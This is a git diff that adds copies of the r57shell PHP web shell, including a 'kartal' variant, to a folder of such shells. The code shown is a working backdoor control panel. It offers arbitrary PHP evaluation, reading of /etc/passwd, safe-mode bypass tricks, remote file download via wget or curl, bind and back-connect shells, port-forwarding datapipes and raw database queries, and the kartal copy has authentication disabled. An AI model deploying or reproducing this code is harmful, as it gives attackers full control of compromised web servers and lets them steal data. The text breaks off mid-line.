sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text57'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text67'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +if(!$safe_mode){ +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.$lang[$language.'_text7'].$table_up2.$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text54'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text76'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.$table_end1.$fe; +echo $fs.$table_up1.$lang[$language.'_text32'].$table_up2.$font; +echo "<div align=center><textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</font>"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.$lang[$language.'_text33'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.$lang[$language.'_text34'].$table_up2.$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text35'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text85'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.$lang[$language.'_text5'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.$table_end1.$fe; +} +if(!$safe_mode&&!$windows){ +echo $fs.$table_up1.$lang[$language.'_text15'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.$table_end1.$fe; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +echo $table_up1.$lang[$language.'_text82'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text77']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>"); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1')); +echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1')); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>"); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1')); +echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option><option>Oracle</option></select>"); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></table>"; +} +if(!$safe_mode&&!$windows){ +echo $table_up1.$lang[$language.'_text81'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'jade.va.us.dal.net')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></table>"; +} +echo $table_up3."<div align=center><font face=Verdana size=-2><b>[ r57shell - Modification By iFX | version ".$version." ]</b></font></div></td></tr></table>".$f; +?> \ No newline at end of file diff --git a/php/PHPshell/م€گr57_kartaم€‘/r57_kartal.jpg b/php/PHPshell/م€گr57_kartaم€‘/r57_kartal.jpg new file mode 100644 index 0000000..0a94640 Binary files /dev/null and b/php/PHPshell/م€گr57_kartaم€‘/r57_kartal.jpg differ diff --git a/php/PHPshell/م€گr57_kartaم€‘/r57_kartal.php b/php/PHPshell/م€گr57_kartaم€‘/r57_kartal.php new file mode 100644 index 0000000..3b749b7 --- /dev/null +++ b/php/PHPshell/م€گr57_kartaم€‘/r57_kartal.php @@ -0,0 +1,1883 @@ +<?php +/******************************************************************************************************/ +/* +/* +/* ssssssss pppp pppp yyyyyy yyyyyy gggg gggg rrrr rrrr uuuu uuuu pppp pppp +/* ss pppp pp yy yy gg gggg rrrr uu uu pppp pp +/* ssssss pp pp yy yy gg gg rr uu uu pp pp +/* ss pp pp yy yy gg gg rr uu uuuu pp pp +/* ssssssss pppppppp yy gggggggg rrrrrrrr uuuu uuuu pppppppp +/* pp yy gg pp +/* pppppp yyyyyy gggggg pppppp +/* +/* kartal_567@hotmail.com[KaRTaL] +/* +/* r57shell.php - &#1089;&#1082;&#1088;&#1080;&#1087;&#1090; &#1085;&#1072; &#1087;&#1093;&#1087; &#1087;&#1086;&#1079;&#1074;&#1086;&#1083;&#1103;&#1102;&#1097;&#1080;&#1081; &#1074;&#1072;&#1084; &#1074;&#1099;&#1087;&#1086;&#1083;&#1085;&#1103;&#1090;&#1100; &#1096;&#1077;&#1083;&#1083; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099; &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077; &#1095;&#1077;&#1088;&#1077;&#1079; &#1073;&#1088;&#1072;&#1091;&#1079;&#1077;&#1088; +/* &#1042;&#1077;&#1088;&#1089;&#1080;&#1103;: 1.23 +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/******************************************************************************************************/ + +/* ~~~ &#1053;&#1072;&#1089;&#1090;&#1088;&#1086;&#1081;&#1082;&#1080; ~~~ */ +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = "q1w2e3r4"; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_SERVER as $k=>$v) + { + $_SERVER[$k] = stripslashes($v); + } + } + +/* ~~~ &#1040;&#1091;&#1090;&#1077;&#1085;&#1090;&#1080;&#1092;&#1080;&#1082;&#1072;&#1094;&#1080;&#1103; ~~~ */ + +// $auth = 1; - &#1040;&#1091;&#1090;&#1077;&#1085;&#1090;&#1080;&#1092;&#1080;&#1082;&#1072;&#1094;&#1080;&#1103; &#1074;&#1082;&#1083;&#1102;&#1095;&#1077;&#1085;&#1072; +// $auth = 0; - &#1040;&#1091;&#1090;&#1077;&#1085;&#1090;&#1080;&#1092;&#1080;&#1082;&#1072;&#1094;&#1080;&#1103; &#1074;&#1099;&#1082;&#1083;&#1102;&#1095;&#1077;&#1085;&#1072; +$auth = 0; + +// &#1051;&#1086;&#1075;&#1080;&#1085; &#1080; &#1087;&#1072;&#1088;&#1086;&#1083;&#1100; &#1076;&#1083;&#1103; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087;&#1072; &#1082; &#1089;&#1082;&#1088;&#1080;&#1087;&#1090;&#1091; +// &#1053;&#1045; &#1047;&#1040;&#1041;&#1059;&#1044;&#1068;&#1058;&#1045; &#1057;&#1052;&#1045;&#1053;&#1048;&#1058;&#1068; &#1055;&#1045;&#1056;&#1045;&#1044; &#1056;&#1040;&#1047;&#1052;&#1045;&#1065;&#1045;&#1053;&#1048;&#1045;&#1052; &#1053;&#1040; &#1057;&#1045;&#1056;&#1042;&#1045;&#1056;&#1045;!!! +$name='teufel'; // &#1083;&#1086;&#1075;&#1080;&#1085; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1103; +$pass='spyms'; // &#1087;&#1072;&#1088;&#1086;&#1083;&#1100; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1103; + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass) + { + header('WWW-Authenticate: Basic realm="shell"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=http://www.spygrup.org>www.spygrup.org</a> : Access Denied</b>"); + } +} +$head = '<!-- &#1047;&#1076;&#1088;&#1072;&#1074;&#1089;&#1090;&#1074;&#1091;&#1081; &#1042;&#1072;&#1089;&#1103; --> +<html> +<head> +<title>shell</title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> + +<STYLE> +tr { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +td { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +.table1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +BACKGROUND-COLOR: #D4D0C8; +} +.td1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +font: 7pt Verdana; +} +.tr1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +} +table { +BORDER-RIGHT: #eeeeee 1px outset; +BORDER-TOP: #eeeeee 1px outset; +BORDER-LEFT: #eeeeee 1px outset; +BORDER-BOTTOM: #eeeeee 1px outset; +BACKGROUND-COLOR: #D4D0C8; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +select { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +submit { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT: buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +BACKGROUND-COLOR: #e4e0d8; +width: 30%; +} +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: Fixedsys bold; +} +BODY { +margin-top: 1px; +margin-right: 1px; +margin-bottom: 1px; +margin-left: 1px; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} +</STYLE>'; +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } +if ($_POST['cmd']=="db_query") + { + echo $head; + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @mysql_query($query,$db); + $error = @mysql_error($db); + if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } + else { + if (@mysql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mysql_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @mysql_free_result($res); + } + } + @mysql_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @mssql_query($query,$db); + if (@mssql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mssql_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */ + @mssql_free_result($res); + } + } + @mssql_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @pg_query($db,$query); + $error = @pg_errormessage($db); + if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } + else { + if (@pg_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @pg_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @pg_free_result($res); + } + } + @pg_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>"; + break; + case 'Oracle': + $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']); + if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; } + else + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5) { + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $stat = @ociparse($db, $query); + @ociexecute($stat); + if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; } + else + { + $rowcount = @ocirowcount($stat); + if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";} + else { + echo "<table width=100%><tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; } + echo "</tr>"; + while(ocifetch($stat)) + { + echo "<tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; } + echo "</tr>"; + } + echo "</table><br>"; + } + @ocifreestatement($stat); + } + } + } + @ocilogoff($db); + } + break; + } + echo "<form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center><textarea cols=65 